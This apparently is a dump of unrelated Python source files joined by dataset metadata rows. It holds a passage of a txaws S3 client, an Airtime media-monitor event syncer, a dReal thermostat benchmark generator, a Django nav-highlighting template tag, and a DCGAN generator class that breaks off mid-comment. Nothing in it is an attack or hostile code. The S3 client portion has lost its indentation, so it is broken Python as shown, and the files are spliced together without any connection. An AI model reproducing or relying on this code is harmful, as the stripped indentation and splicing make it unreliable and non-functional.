event = root.findtext("TopicConfiguration/Event")
return NotificationConfiguration(topic, event)
def get_bucket_versioning_config(self, bucket):
"""
Get the versioning configuration of a bucket.
        @param bucket: The name of the bucket.
        @return: A C{Deferred} that will fire with the bucket's versioning
        configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?versioning"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_versioning_config)
return d
def _parse_versioning_config(self, (response, xml_bytes)):
"""Parse a C{VersioningConfiguration} XML document."""
root = XML(xml_bytes)
mfa_delete = root.findtext("MfaDelete")
status = root.findtext("Status")
return VersioningConfiguration(mfa_delete=mfa_delete, status=status)
def get_bucket_acl(self, bucket):
"""
Get the access control policy for a bucket.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?acl"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_acl)
return d
def put_bucket_acl(self, bucket, access_control_policy):
"""
Set access control policy on a bucket.
"""
data = access_control_policy.to_xml()
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name=b"?acl"),
body=data,
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_acl)
return d
def _parse_acl(self, (response, xml_bytes)):
"""
Parse an C{AccessControlPolicy} XML document and convert it into an
L{AccessControlPolicy} instance.
"""
return AccessControlPolicy.from_xml(xml_bytes)
def put_object(self, bucket, object_name, data=None, content_type=None,
metadata={}, amz_headers={}, body_producer=None):
"""
Put an object in a bucket.
An existing object with the same name will be replaced.
@param bucket: The name of the bucket.
        @param object_name: The name of the object.
@param data: The data to write.
@param content_type: The type of data being written.
@param metadata: A C{dict} used to build C{x-amz-meta-*} headers.
@param amz_headers: A C{dict} used to build C{x-amz-*} headers.
        @return: A C{Deferred} that will fire with the result of the request.
"""
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name=object_name),
headers=self._headers(content_type),
metadata=metadata,
amz_headers=amz_headers,
body=data,
body_producer=body_producer,
)
d = self._submit(self._query_factory(details))
d.addCallback(itemgetter(1))
return d
def copy_object(self, source_bucket, source_object_name, dest_bucket=None,
dest_object_name=None, metadata={}, amz_headers={}):
"""
Copy an object stored in S3 from a source bucket to a destination
bucket.
@param source_bucket: The S3 bucket to copy the object from.
@param source_object_name: The name of the object to copy.
@param dest_bucket: Optionally, the S3 bucket to copy the object to.
Defaults to C{source_bucket}.
@param dest_object_name: Optionally, the name of the new object.
Defaults to C{source_object_name}.
@param metadata: A C{dict} used to build C{x-amz-meta-*} headers.
@param amz_headers: A C{dict} used to build C{x-amz-*} headers.
        @return: A C{Deferred} that will fire with the result of the request.
"""
dest_bucket = dest_bucket or source_bucket
dest_object_name = dest_object_name or source_object_name
amz_headers["copy-source"] = "/%s/%s" % (source_bucket,
source_object_name)
details = self._details(
method=b"PUT",
url_context=self._url_context(
bucket=dest_bucket, object_name=dest_object_name,
),
metadata=metadata,
amz_headers=amz_headers,
)
d = self._submit(self._query_factory(details))
return d
def get_object(self, bucket, object_name):
"""
Get an object from a bucket.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
d.addCallback(itemgetter(1))
return d
def head_object(self, bucket, object_name):
"""
Retrieve object metadata only.
"""
details = self._details(
method=b"HEAD",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
d.addCallback(lambda (response, body): _to_dict(response.responseHeaders))
return d
def delete_object(self, bucket, object_name):
"""
Delete an object from a bucket.
Once deleted, there is no method to restore or undelete an object.
"""
details = self._details(
method=b"DELETE",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
return d
def put_object_acl(self, bucket, object_name, access_control_policy):
"""
Set access control policy on an object.
"""
data = access_control_policy.to_xml()
details = self._details(
method=b"PUT",
url_context=self._url_context(
bucket=bucket, object_name='%s?acl' % (object_name,),
),
body=data,
)
query = self._query_factory(details)
d = self._submit(query)
d.addCallback(self._parse_acl)
return d
def get_object_acl(self, bucket, object_name):
"""
Get the access control policy for an object.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name='%s?acl' % (object_name,)),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_acl)
return d
def put_request_payment(self, bucket, payer):
"""
Set request payment configuration on bucket to payer.
@param bucket: The name of the bucket.
@param payer: The name of the payer.
@return: A C{Deferred} that will fire with the result of the request.
"""
data = RequestPayment(payer).to_xml()
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name="?requestPayment"),
body=data,
)
d = self._submit(self._query_factory(details))
return d
def get_request_payment(self, bucket):
"""
Get the request payment configuration on a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the name of the payer.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?requestPayment"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_get_request_payment)
return d
def _parse_get_request_payment(self, (response, xml_bytes)):
"""
Parse a C{RequestPaymentConfiguration} XML document and extract the
payer.
"""
return RequestPayment.from_xml(xml_bytes).payer
def init_multipart_upload(self, bucket, object_name, content_type=None,
amz_headers={}, metadata={}):
"""
Initiate a multipart upload to a bucket.
@param bucket: The name of the bucket
@param object_name: The object name
@param content_type: The Content-Type for the object
@param metadata: C{dict} containing additional metadata
@param amz_headers: A C{dict} used to build C{x-amz-*} headers.
        @return: A C{Deferred} that fires with a C{MultipartInitiationResponse}
            for the new upload.
"""
objectname_plus = '%s?uploads' % object_name
details = self._details(
method=b"POST",
url_context=self._url_context(bucket=bucket, object_name=objectname_plus),
headers=self._headers(content_type),
metadata=metadata,
amz_headers=amz_headers,
)
d = self._submit(self._query_factory(details))
d.addCallback(
lambda (response, body): MultipartInitiationResponse.from_xml(body)
)
return d
def upload_part(self, bucket, object_name, upload_id, part_number,
data=None, content_type=None, metadata={},
body_producer=None):
"""
Upload a part of data corresponding to a multipart upload.
@param bucket: The bucket name
@param object_name: The object name
@param upload_id: The multipart upload id
@param part_number: The part number
@param data: Data (optional, requires body_producer if not specified)
@param content_type: The Content-Type
@param metadata: Additional metadata
@param body_producer: an C{IBodyProducer} (optional, requires data if
not specified)
        @return: A C{Deferred} that fires with a C{dict} of the response headers.
"""
parms = 'partNumber=%s&uploadId=%s' % (str(part_number), upload_id)
objectname_plus = '%s?%s' % (object_name, parms)
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name=objectname_plus),
headers=self._headers(content_type),
metadata=metadata,
body=data,
)
d = self._submit(self._query_factory(details))
d.addCallback(lambda (response, data): _to_dict(response.responseHeaders))
return d
def complete_multipart_upload(self, bucket, object_name, upload_id,
parts_list, content_type=None, metadata={}):
"""
Complete a multipart upload.
        N.B. This can possibly be a slow operation.
@param bucket: The bucket name
@param object_name: The object name
@param upload_id: The multipart upload id
@param parts_list: A List of all the parts
(2-tuples of part sequence number and etag)
@param content_type: The Content-Type of the object
@param metadata: C{dict} containing additional metadata
@return: a C{Deferred} that fires after request is complete
"""
data = self._build_complete_multipart_upload_xml(parts_list)
objectname_plus = '%s?uploadId=%s' % (object_name, upload_id)
details = self._details(
method=b"POST",
url_context=self._url_context(bucket=bucket, object_name=objectname_plus),
headers=self._headers(content_type),
metadata=metadata,
body=data,
)
d = self._submit(self._query_factory(details))
# TODO - handle error responses
d.addCallback(
lambda (response, body): MultipartCompletionResponse.from_xml(body)
)
return d
def _build_complete_multipart_upload_xml(self, parts_list):
xml = []
parts_list.sort(key=lambda p: int(p[0]))
xml.append('<CompleteMultipartUpload>')
for pt in parts_list:
xml.append('<Part>')
xml.append('<PartNumber>%s</PartNumber>' % pt[0])
xml.append('<ETag>%s</ETag>' % pt[1])
xml.append('</Part>')
xml.append('</CompleteMultipartUpload>')
return '\n'.join(xml)
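# ----------------------------------------------------------------------
# Editor's usage sketch (not part of the original txaws API surface): the
# multipart helpers above are meant to be chained roughly as below.  This is
# illustrative only; it assumes an already-authenticated S3Client instance,
# that the initiation response exposes an `upload_id` attribute, and that the
# header dict returned by upload_part() carries the part's ETag under "etag".
# Treat those names as assumptions, not guarantees.
def _example_multipart_upload(client, bucket, object_name, chunks):
    """Illustrative only: upload `chunks` (a list of byte strings) as parts."""
    from twisted.internet import defer
    def _run(init_response):
        upload_id = init_response.upload_id
        parts = []
        d = defer.succeed(None)
        for number, chunk in enumerate(chunks, 1):
            def _send(_, number=number, chunk=chunk):
                # Upload one numbered part of the object.
                return client.upload_part(
                    bucket, object_name, upload_id, number, data=chunk)
            def _collect(headers, number=number):
                # Remember (part number, etag) for the completion call.
                parts.append((number, headers["etag"][0]))
            d.addCallback(_send)
            d.addCallback(_collect)
        d.addCallback(lambda _: client.complete_multipart_upload(
            bucket, object_name, upload_id, parts))
        return d
    return client.init_multipart_upload(bucket, object_name).addCallback(_run)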
class Query(BaseQuery):
"""A query for submission to the S3 service."""
def __init__(self, bucket=None, object_name=None, data="",
content_type=None, metadata={}, amz_headers={},
body_producer=None, *args, **kwargs):
super(Query, self).__init__(*args, **kwargs)
# data might be None or "", alas.
if data and body_producer is not None:
raise ValueError("data and body_producer are mutually exclusive.")
self.bucket = bucket
self.object_name = object_name
self.data = data
self.body_producer = body_producer
self.content_type = content_type
self.metadata = metadata
self.amz_headers = amz_headers
self._date = datetimeToString()
if not self.endpoint or not self.endpoint.host:
self.endpoint = AWSServiceEndpoint(S3_ENDPOINT)
self.endpoint.set_method(self.action)
@property
def date(self):
"""
Return the date and emit a deprecation warning.
"""
warnings.warn("txaws.s3.client.Query.date is a deprecated attribute",
DeprecationWarning,
stacklevel=2)
return self._date
@date.setter
def date(self, value):
"""
Set the date.
@param value: The new date for this L{Query}.
@type value: L{str}
"""
self._date = value
def set_content_type(self):
"""
Set the content type based on the file extension used in the object
name.
"""
if self.object_name and not self.content_type:
# XXX nothing is currently done with the encoding... we may
# need to in the future
self.content_type, encoding = mimetypes.guess_type(
self.object_name, strict=False)
def get_headers(self, instant):
"""
Build the list of headers needed in order to perform S3 operations.
"""
headers = {'x-amz-date': _auth_v4.makeAMZDate(instant)}
if self.body_producer is None:
data = self.data
if data is None:
data = b""
headers["x-amz-content-sha256"] = hashlib.sha256(data).hexdigest()
else:
data = None
headers["x-amz-content-sha256"] = b"UNSIGNED-PAYLOAD"
for key, value in self.metadata.iteritems():
headers["x-amz-meta-" + key] = value
for key, value in self.amz_headers.iteritems():
headers["x-amz-" + key] = value
# Before we check if the content type is set, let's see if we can set
        # it by guessing the mimetype.
self.set_content_type()
if self.content_type is not None:
headers["Content-Type"] = self.content_type
if self.creds is not None:
headers["Authorization"] = self.sign(
headers,
data,
s3_url_context(self.endpoint, self.bucket, self.object_name),
instant,
method=self.action)
return headers
def sign(self, headers, data, url_context, instant, method,
region=REGION_US_EAST_1):
"""Sign this query using its built in credentials."""
headers["host"] = url_context.get_encoded_host()
if data is None:
request = _auth_v4._CanonicalRequest.from_request_components(
method=method,
url=url_context.get_encoded_path(),
headers=headers,
headers_to_sign=('host', 'x-amz-date'),
payload_hash=None,
)
else:
request = _auth_v4._CanonicalRequest.from_request_components_and_payload(
method=method,
url=url_context.get_encoded_path(),
headers=headers,
headers_to_sign=('host', 'x-amz-date'),
payload=data,
)
return _auth_v4._make_authorization_header(
region=region,
service="s3",
canonical_request=request,
credentials=self.creds,
instant=instant)
def submit(self, url_context=None, utcnow=datetime.datetime.utcnow):
"""Submit this query.
@return: A deferred from get_page
"""
if not url_context:
url_context = s3_url_context(
self.endpoint, self.bucket, self.object_name)
d = self.get_page(
url_context.get_encoded_url(),
method=self.action,
postdata=self.data or b"",
headers=self.get_headers(utcnow()),
)
return d.addErrback(s3_error_wrapper)
def s3_url_context(service_endpoint, bucket=None, object_name=None):
"""
Create a URL based on the given service endpoint and suitable for
the given bucket or object.
@param service_endpoint: The service endpoint on which to base the
resulting URL.
@type service_endpoint: L{AWSServiceEndpoint}
@param bucket: If given, the name of a bucket to reference.
@type bucket: L{unicode}
@param object_name: If given, the name of an object or object
subresource to reference.
@type object_name: L{unicode}
"""
# Define our own query parser which can handle the consequences of
# `?acl` and such (subresources). At its best, parse_qsl doesn't
# let us differentiate between these and empty values (such as
# `?acl=`).
def p(s):
results = []
args = s.split(u"&")
for a in args:
pieces = a.split(u"=")
if len(pieces) == 1:
results.append((unquote(pieces[0]),))
elif len(pieces) == 2:
results.append(tuple(map(unquote, pieces)))
else:
raise Exception("oh no")
return results
query = []
path = []
if bucket is None:
path.append(u"")
else:
if isinstance(bucket, bytes):
bucket = bucket.decode("utf-8")
path.append(bucket)
if object_name is None:
path.append(u"")
else:
if isinstance(object_name, bytes):
object_name = object_name.decode("utf-8")
if u"?" in object_name:
object_name, query = object_name.split(u"?", 1)
query = p(query)
object_name_components = object_name.split(u"/")
if object_name_components[0] == u"":
object_name_components.pop(0)
if object_name_components:
path.extend(object_name_components)
else:
path.append(u"")
return _S3URLContext(
scheme=service_endpoint.scheme.decode("utf-8"),
host=service_endpoint.get_host().decode("utf-8"),
port=service_endpoint.port,
path=path,
query=query,
)
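# Editor's illustration (not part of the original module): the parser above
# keeps bare subresources such as "?acl" as one-element tuples, which is what
# distinguishes them from explicitly empty parameters like "acl=".  The
# endpoint argument is assumed to be an ordinary AWSServiceEndpoint.
def _example_acl_subresource_url(endpoint, bucket=u"mybucket", key=u"mykey"):
    """Illustrative only: build an URL carrying an ?acl subresource."""
    context = s3_url_context(endpoint, bucket, u"%s?acl" % (key,))
    return context.get_encoded_url()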
class _S3URLContext(_URLContext):
# Backwards compatibility layer. For deprecation. s3_url_context
# should just return an _URLContext and application code should
# interact with that interface.
def get_host(self):
return self.get_encoded_host()
def get_path(self):
return self.get_encoded_path()
def get_url(self):
return self.get_encoded_url()
# Backwards compatibility layer. For deprecation.
def URLContext(service_endpoint, bucket=None, object_name=None):
args = (service_endpoint,)
for s in (bucket, object_name):
if s is not None:
args += (s.decode("utf-8"),)
return s3_url_context(*args)
deprecatedModuleAttribute(
Version("txAWS", 0, 3, 0),
"See txaws.s3.client.query",
__name__,
"Query",
)
deprecatedModuleAttribute(
Version("txAWS", 0, 3, 0),
"See txaws.s3.client.s3_url_context",
__name__,
"URLContext",
)
| mit | 3,476,167,274,423,799,300 | 34.880874 | 96 | 0.591788 | false |
sourcefabric/Airtime | python_apps/media-monitor/mm2/media/monitor/watchersyncer.py | 10 | 6311 | # -*- coding: utf-8 -*-
import time
import copy
from handler import ReportHandler
from log import Loggable
from exceptions import BadSongFile
from eventcontractor import EventContractor
from events import EventProxy
from request import ThreadedRequestSync, RequestSync
from ..saas.thread import InstanceInheritingThread, getsig
class TimeoutWatcher(InstanceInheritingThread,Loggable):
"""
    The job of this thread is to keep an eye on WatchSyncer and force a
    request whenever pending requests have been waiting longer than the timeout.
"""
def __init__(self, watcher, timeout=5):
self.logger.info("Created timeout thread...")
super(TimeoutWatcher, self).__init__()
self.watcher = watcher
self.timeout = timeout
def run(self):
# We try to launch a new thread every self.timeout seconds
        # so that users do not have to wait for the queue to fill up
while True:
time.sleep(self.timeout)
            # If there are any requests left we launch them. Note that this
# isn't strictly necessary since RequestSync threads already
# chain themselves
if self.watcher.requests_in_queue():
self.logger.info("We have %d requests waiting to be launched" %
self.watcher.requests_left_count())
self.watcher.request_do()
# Same for events, this behaviour is mandatory however.
if self.watcher.events_in_queue():
self.logger.info("We have %d events that are unflushed" %
self.watcher.events_left_count())
self.watcher.flush_events()
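# Editor's sketch (illustrative; the signal name and numbers below are
# assumptions, not values taken from this project): WatchSyncer spawns its own
# TimeoutWatcher in __init__, so an owner only constructs the syncer and then
# routes incoming filesystem events to its handle() method.
def _example_build_watch_syncer():
    """Illustrative only: a syncer that flushes every 10s or every 50 events."""
    return WatchSyncer(signal='media_monitor', chunking_number=50, timeout=10)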
class WatchSyncer(ReportHandler,Loggable):
def __init__(self, signal, chunking_number = 100, timeout=15):
self.timeout = float(timeout)
self.chunking_number = int(chunking_number)
self.request_running = False
self.__current_thread = None
self.__requests = []
self.contractor = EventContractor()
self.__reset_queue()
tc = TimeoutWatcher(self, self.timeout)
tc.daemon = True
tc.start()
super(WatchSyncer, self).__init__(signal=getsig(signal))
def handle(self, sender, event):
"""
We implement this abstract method from ReportHandler
"""
if hasattr(event, 'pack'):
# We push this event into queue
self.logger.info("Received event '%s'. Path: '%s'" % \
( event.__class__.__name__,
getattr(event,'path','No path exists') ))
try:
# If there is a strange bug anywhere in the code the next line
# should be a suspect
ev = EventProxy(event)
if self.contractor.register(ev): self.push_queue(ev)
#self.push_queue( event )
except BadSongFile as e:
self.fatal_exception("Received bas song file '%s'" % e.path, e)
except Exception as e: self.unexpected_exception(e)
else:
self.logger.info("Received event that does not implement packing.\
Printing its representation:")
self.logger.info( repr(event) )
def requests_left_count(self):
"""
returns the number of requests left in the queue. requests are
functions that create RequestSync threads
"""
return len(self.__requests)
def events_left_count(self):
"""
Returns the number of events left in the queue to create a request
"""
return len(self.__queue)
def push_queue(self, elem):
"""
        Add 'elem' to the event queue and launch a request if we are
        over the chunking number
"""
self.logger.info("Added event into queue")
if self.events_left_count() >= self.chunking_number:
self.push_request()
self.request_do() # Launch the request if nothing is running
self.__queue.append(elem)
def flush_events(self):
"""
Force flush the current events held in the queue
"""
self.logger.info("Force flushing events...")
self.push_request()
self.request_do()
def events_in_queue(self):
"""
returns true if there are events in the queue that haven't been
processed yet
"""
return len(self.__queue) > 0
def requests_in_queue(self):
"""
Returns true if there are any requests in the queue. False otherwise.
"""
return len(self.__requests) > 0
def flag_done(self):
"""
called by request thread when it finishes operating
"""
self.request_running = False
self.__current_thread = None
# This call might not be necessary but we would like to get the
# ball running with the requests as soon as possible
if self.requests_in_queue() > 0: self.request_do()
def request_do(self):
"""
launches a request thread only if one is not running right now
"""
if not self.request_running:
self.request_running = True
self.__requests.pop()()
def push_request(self):
"""
Create a request from the current events in the queue and schedule it
"""
self.logger.info("WatchSyncer : Unleashing request")
# want to do request asyncly and empty the queue
requests = copy.copy(self.__queue)
def launch_request():
# Need shallow copy here
t = ThreadedRequestSync( RequestSync.create_with_api_client(
watcher=self, requests=requests) )
self.__current_thread = t
self.__requests.append(launch_request)
self.__reset_queue()
def __reset_queue(self): self.__queue = []
def __del__(self):
#this destructor is completely untested and it's unclear whether
#it's even doing anything useful. consider removing it
if self.events_in_queue():
self.logger.warn("Terminating with events still in the queue...")
if self.requests_in_queue():
self.logger.warn("Terminating with http requests still pending...")
| agpl-3.0 | -980,464,874,824,078,600 | 37.018072 | 79 | 0.590081 | false |
danbryce/dreal | benchmarks/network/thermostat/thermostat-triple-i-p-sat.py | 2 | 4655 |
from gen import *
##########
# shared #
##########
flow_var[0] = """
(declare-fun tau () Real)
"""
flow_dec[0] = """
(define-ode flow_1 ((= d/dt[tau] 1)))
"""
state_dec[0] = """
(declare-fun time_{0} () Real)
(declare-fun tau_{0}_0 () Real)
(declare-fun tau_{0}_t () Real)
"""
state_val[0] = """
(assert (<= 0 time_{0})) (assert (<= time_{0} 1))
(assert (<= 0 tau_{0}_0)) (assert (<= tau_{0}_0 1))
(assert (<= 0 tau_{0}_t)) (assert (<= tau_{0}_t 1))
"""
cont_cond[0] = ["""
(assert (and (>= tau_{0}_0 0) (<= tau_{0}_0 1)
(>= tau_{0}_t 0) (<= tau_{0}_t 1)
(forall_t 1 [0 time_{0}] (>= tau_{0}_t 0))
(forall_t 2 [0 time_{0}] (<= tau_{0}_t 1))))
(assert (and (= [x1_{0}_t x2_{0}_t x3_{0}_t tau_{0}_t]
(pintegral 0. time_{0}
[x1_{0}_0 x2_{0}_0 x3_{0}_0 tau_{0}_0]
[holder_{1} holder_{2} holder_{3} holder_{4}]))
(connect holder_{4} flow_1)))"""]
jump_cond[0] = ["""
(assert (and (= tau_{0}_t 1) (= tau_{1}_0 0)))"""]
################
# thermostat 1 #
################
flow_var[1] = """
(declare-fun x1 () Real)
"""
flow_dec[1] = """
(define-ode flow_2 ((= d/dt[x1] (* 0.015 (- 100 (+ (* (- 1 0.03) x1) (* 0.01 x2) (* 0.02 x3)))))))
(define-ode flow_3 ((= d/dt[x1] (* -0.015 (+ (* (- 1 0.03) x1) (* 0.01 x2) (* 0.02 x3))))))
"""
state_dec[1] = """
(declare-fun mode_1_{0} () Int)
(declare-fun x1_{0}_0 () Real)
(declare-fun x1_{0}_t () Real)
"""
state_val[1] = """
(assert (<= -20 x1_{0}_0)) (assert (<= x1_{0}_0 100))
(assert (<= -20 x1_{0}_t)) (assert (<= x1_{0}_t 100))
"""
cont_cond[1] = ["""
(assert (or (and (= mode_1_{0} 2) (connect holder_{1} flow_2))
(and (= mode_1_{0} 1) (connect holder_{1} flow_3))))
(assert (not (and (connect holder_{1} flow_2) (connect holder_{1} flow_3))))"""]
jump_cond[1] = ["""
(assert (and (= x1_{1}_0 x1_{0}_t)))
(assert (or (and (<= x1_{0}_t 20) (= mode_1_{1} 2))
(and (> x1_{0}_t 20) (= mode_1_{1} 1))))"""]
################
# thermostat 2 #
################
flow_var[2] = """
(declare-fun x2 () Real)
"""
flow_dec[2] = """
(define-ode flow_4 ((= d/dt[x2] (* 0.045 (- 200 (+ (* (- 1 0.06) x2) (* 0.01 x1) (* 0.05 x3)))))))
(define-ode flow_5 ((= d/dt[x2] (* -0.045 (+ (* (- 1 0.06) x2) (* 0.01 x1) (* 0.05 x3))))))
"""
state_dec[2] = """
(declare-fun mode_2_{0} () Int)
(declare-fun x2_{0}_0 () Real)
(declare-fun x2_{0}_t () Real)
"""
state_val[2] = """
(assert (<= -20 x2_{0}_0)) (assert (<= x2_{0}_0 100))
(assert (<= -20 x2_{0}_t)) (assert (<= x2_{0}_t 100))
"""
cont_cond[2] = ["""
(assert (or (and (= mode_2_{0} 2) (connect holder_{2} flow_4))
(and (= mode_2_{0} 1) (connect holder_{2} flow_5))))
(assert (not (and (connect holder_{2} flow_4) (connect holder_{2} flow_5))))"""]
jump_cond[2] = ["""
(assert (and (= x2_{1}_0 x2_{0}_t)))
(assert (or (and (<= x2_{0}_t 20) (= mode_2_{1} 2))
(and (> x2_{0}_t 20) (= mode_2_{1} 1))))"""]
################
# thermostat 3 #
################
flow_var[3] = """
(declare-fun x3 () Real)
"""
flow_dec[3] = """
(define-ode flow_6 ((= d/dt[x3] (* 0.03 (- 300 (+ (* (- 1 0.07) x3) (* 0.02 x1) (* 0.05 x2)))))))
(define-ode flow_7 ((= d/dt[x3] (* -0.03 (+ (* (- 1 0.07) x3) (* 0.02 x1) (* 0.05 x2))))))
"""
state_dec[3] = """
(declare-fun mode_3_{0} () Int)
(declare-fun x3_{0}_0 () Real)
(declare-fun x3_{0}_t () Real)
"""
state_val[3] = """
(assert (<= -20 x3_{0}_0)) (assert (<= x3_{0}_0 100))
(assert (<= -20 x3_{0}_t)) (assert (<= x3_{0}_t 100))
"""
cont_cond[3] = ["""
(assert (or (and (= mode_3_{0} 2) (connect holder_{3} flow_6))
(and (= mode_3_{0} 1) (connect holder_{3} flow_7))))
(assert (not (and (connect holder_{3} flow_6) (connect holder_{3} flow_7))))"""]
jump_cond[3] = ["""
(assert (and (= x3_{1}_0 x3_{0}_t)))
(assert (or (and (<= x3_{0}_t 20) (= mode_3_{1} 2))
(and (> x3_{0}_t 20) (= mode_3_{1} 1))))"""]
#############
# Init/Goal #
#############
init_cond = """
(assert (= tau_{0}_0 0))
(assert (= mode_1_{0} 2))
(assert (and (>= x1_{0}_0 (- 20 1)) (<= x1_{0}_0 (+ 20 1))))
(assert (= mode_2_{0} 2))
(assert (and (>= x2_{0}_0 (- 20 1)) (<= x2_{0}_0 (+ 20 1))))
(assert (= mode_3_{0} 2))
(assert (and (>= x3_{0}_0 (- 20 1)) (<= x3_{0}_0 (+ 20 1))))
"""
goal_cond = """
(assert (or (< x1_{0}_t (- 20 7)) (> x1_{0}_t (+ 20 7))))
(assert (or (< x2_{0}_t (- 20 7)) (> x2_{0}_t (+ 20 7))))
(assert (or (< x3_{0}_t (- 20 7)) (> x3_{0}_t (+ 20 7))))
"""
import sys
try:
bound = int(sys.argv[1])
except (IndexError, ValueError):
    print("Usage: %s <Bound>" % sys.argv[0])
else:
generate(bound, 1, [0,1,2,3], 4, init_cond, goal_cond)
| gpl-2.0 | 4,517,924,462,000,548,000 | 25.907514 | 98 | 0.441461 | false |
allianceauth/allianceauth | allianceauth/thirdparty/navhelper/templatetags/navactive.py | 5 | 2726 | """
The MIT License (MIT)
Copyright (c) 2013 Guillaume Luchet
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from django.template import Library
from django.urls import resolve
from django.conf import settings
import re
register = Library()
@register.simple_tag
def renavactive(request, pattern):
"""
{% renavactive request "^/a_regex" %}
"""
if re.search(pattern, request.path):
return getattr(settings, "NAVHELPER_ACTIVE_CLASS", "active")
return getattr(settings, "NAVHELPER_NOT_ACTIVE_CLASS", "")
@register.simple_tag
def navactive(request, urls):
"""
{% navactive request "view_name another_view_name" %}
"""
url_list = set(urls.split())
resolved = resolve(request.path)
resolved_urls = set()
if resolved.url_name:
resolved_urls.add(resolved.url_name)
if resolved.namespaces:
resolved_urls = resolved_urls.union(["{}:{}".format(namespace, resolved.url_name) for namespace in resolved.namespaces])
resolved_urls = resolved_urls.union(["{}:".format(namespace) for namespace in resolved.namespaces])
if getattr(resolved, 'app_name', None):
resolved_urls = resolved_urls.union(["{}:{}".format(resolved.app_name, resolved.url_name), "{}:".format(resolved.app_name)])
if getattr(resolved, 'app_names', []):
resolved_urls = resolved_urls.union(["{}:{}".format(app_name, resolved.url_name) for app_name in resolved.app_names])
resolved_urls = resolved_urls.union(["{}:".format(app_name) for app_name in resolved.app_names])
if url_list and resolved_urls and bool(resolved_urls & url_list):
return getattr(settings, "NAVHELPER_ACTIVE_CLASS", "active")
return getattr(settings, "NAVHELPER_NOT_ACTIVE_CLASS", "")
| gpl-2.0 | -3,972,329,846,212,784,600 | 42.269841 | 132 | 0.724872 | false |
shrtCKT/simple-dnn | simple_dnn/generative/generator.py | 1 | 5736 | """ The generator network of a GAN.
"""
import tensorflow as tf
import tensorflow.contrib.slim as slim
class GeneratorDC(object):
""" Deep Convolutional Generator.
"""
def __init__(self, x_dims, x_ch, g_conv_units,
g_kernel_sizes=[5,5], g_strides=[2, 2], g_paddings='SAME',
g_activation_fn=tf.nn.relu):
"""
DCGAN Generator network.
        :param x_dims: 2d list [width, height]; the x dimensions.
        :param x_ch: int; the channels in x.
        :param g_conv_units: a list; the number of channels in each conv layer.
        :param g_kernel_sizes: A list of length 2 [kernel_height, kernel_width], used for all the conv layer filters.
                           Or a list of such lists, one [kernel_height, kernel_width] filter size per conv layer.
        :param g_strides: a list of [stride_height, stride_width] pairs, one per conv layer,
                      or a single 2d list in which case all the conv layers will have the same stride.
        :param g_paddings: string or list of strings, specifying the padding type.
        :param g_activation_fn: the activation function applied to the transposed conv layers.
"""
# Data Config
self.x_dims = x_dims
self.x_ch = x_ch
######################## Generator
self.g_conv_units = g_conv_units
if isinstance(g_kernel_sizes[0], list) or isinstance(g_kernel_sizes[0], tuple):
assert len(g_conv_units) == len(g_kernel_sizes)
self.g_kernel_sizes = g_kernel_sizes
else:
self.g_kernel_sizes = [g_kernel_sizes] * len(g_conv_units)
if isinstance(g_strides[0], list) or isinstance(g_strides[0], tuple):
assert len(g_conv_units) == len(g_strides)
self.g_strides = g_strides
else:
self.g_strides = [g_strides] * len(g_conv_units)
if isinstance(g_paddings, list):
assert len(g_conv_units) == len(g_paddings)
self.g_paddings = g_paddings
else:
self.g_paddings = [g_paddings] * len(g_conv_units)
self.g_activation_fn = g_activation_fn
def __call__(self, z, ys=None):
if ys is None:
z_concat = z
else:
z_concat = tf.concat([z, ys], axis=1)
zP = slim.fully_connected(
z_concat, 4*4*256, normalizer_fn=slim.batch_norm,
activation_fn=tf.nn.relu,scope='g_project',
weights_initializer=tf.truncated_normal_initializer(stddev=0.01))
zCon = tf.reshape(zP,[-1,4,4,256])
net = zCon
with slim.arg_scope([slim.conv2d_transpose],
weights_initializer=tf.truncated_normal_initializer(stddev=0.02),
normalizer_fn=slim.batch_norm,
activation_fn=self.g_activation_fn):
for i, (g_unit, kernel_size, stride, padding) in enumerate(zip(
self.g_conv_units, self.g_kernel_sizes, self.g_strides, self.g_paddings)):
net = slim.conv2d_transpose(net, num_outputs=g_unit, kernel_size=kernel_size,
stride=stride, padding=padding, scope='g_conv{0}'.format(i))
g_out = slim.convolution2d_transpose(
net,num_outputs=self.x_ch, kernel_size=self.x_dims, padding="SAME",
biases_initializer=None,activation_fn=tf.nn.tanh,
scope='g_out', weights_initializer=tf.truncated_normal_initializer(stddev=0.02))
return g_out
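# Editor's usage sketch (illustrative; the layer sizes below are assumptions,
# not values used elsewhere in this project): the generator object is built
# once and then called like a function on a noise batch `z`, optionally with
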